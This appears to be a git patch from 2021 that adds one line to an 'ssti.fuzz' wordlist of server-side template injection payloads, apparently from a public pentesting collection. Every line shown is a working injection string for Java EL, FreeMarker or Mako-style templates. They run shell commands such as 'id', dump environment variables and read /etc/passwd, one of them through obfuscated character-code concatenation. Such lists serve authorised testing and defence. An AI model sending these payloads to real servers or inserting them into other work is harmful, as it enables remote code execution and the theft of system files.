From 106ea6b2e7f7a0f983a98b30cf119774bf0b6292 Mon Sep 17 00:00:00 2001
From: p0dalirius <podalirius@protonmail.com>
Date: Mon, 4 Oct 2021 09:21:10 +0200
Subject: [PATCH] Update ssti.fuzz

---
 Server Side Template Injection/Intruder/ssti.fuzz | 1 +
 1 file changed, 1 insertion(+)

diff --git a/Server Side Template Injection/Intruder/ssti.fuzz b/Server Side Template Injection/Intruder/ssti.fuzz
index 469eb62..1918b46 100644
--- a/Server Side Template Injection/Intruder/ssti.fuzz	
+++ b/Server Side Template Injection/Intruder/ssti.fuzz	
@@ -47,3 +47,4 @@ ${"freemarker.template.utility.Execute"?new()("id")}
 ${T(java.lang.System).getenv()}
 ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")}
+${self.module.runtime.util.os.system("id")}